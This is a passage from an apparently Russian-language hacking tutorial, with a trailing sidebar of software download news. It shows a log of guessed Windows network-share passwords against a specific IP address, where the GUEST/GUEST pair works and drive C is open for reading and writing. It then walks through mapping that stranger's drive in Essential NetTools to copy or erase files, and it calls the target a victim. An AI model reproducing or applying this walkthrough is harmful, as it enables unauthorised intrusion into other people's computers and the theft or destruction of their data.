"ADMINISTRATOR", password "ACCESS": failed * Trying username "ADMINISTRATOR", password "USER": failed * Trying username "ADMINISTRATOR", password "BACKUP": failed * Trying username "ADMINISTRATOR", password "SYSTEM": failed * Trying username "ADMINISTRATOR", password "SERVER": failed  * Trying username "ADMINISTRATOR", password "LOCAL": failed * Trying username "GUEST", password "": failed * Trying username "GUEST", password "ADMINISTRATOR": failed * Trying username "GUEST", password "GUEST": succeeded - пароль успешно подобран * Obtained share list: - список возможных доступных ресурсов IPC$ Remote IPC E$ Default share D$ Default share C  ADMIN$ Remote Admin C$ Default share * Obtained server information: Server=[SKY] User=[] Workgroup=[SKYGROUP] Domain=[] * Checking share E$: access denied - доступ запрещен * Checking share D$: access denied - доступ запрещен * Checking share C: read-write access - доступ разрешен для чтения-записи * Checking share ADMIN$: access denied * Checking share C$: access denied  * Finished checking 194.153.128.47   Ну вот мы и нашли подходящую жертву! Как видно из списка, мы можем подключиться к диску С (разрешен доступ для чтения и записи), то есть мы можем записывать жертве на диск, стирать с его диска, копировать с его диска!   Теперь нам нужно подключить удаленный компьютер. В этом нет ничего сложного. Для этого нам нужно изменить рабочую группу согласно вышеописанному способу. В Essential NetTools открыть NBScan и выделить потенциальную "жертву", в нашем случае это Sky с рабочей группой Circus и IP-адресом 194.153.128.47, нажать правую кнопку мышки и выбрать в контекстном меню "Open computer". В ответ откроется стандартное окно Windows где будет присутствовать диск "С". Наводим на этот самый диск "С" нажимаем правую кнопку мыши и в контекстном меню выбираем "Подключить сетевой диск", когда главный каталог будет считан мы можем начинать "лазить", а точнее сказать "ползать" по диску "С" удаленного компьютера с адресом 194.153.128.47, делать это можно при помощи стандартного "Проводника", Windows Commander и других программ.

www.hackersoft.ru


 

..:::Новинки:::..

Windows Commander 5.11 Свежая версия.

Новая версия
IrfanView 3.75 (рус)

Обновление текстового редактора TextEd, уже 1.75a

System mechanic 3.7f
Новая версия

Обновление плагинов для WC, смотрим :-)

Весь Winamp
Посетите новый сайт.

WinRaR 3.00
Релиз уже здесь

PowerDesk 4.0 free
Просто - напросто сильный upgrade проводника.

..:::Счетчики:::..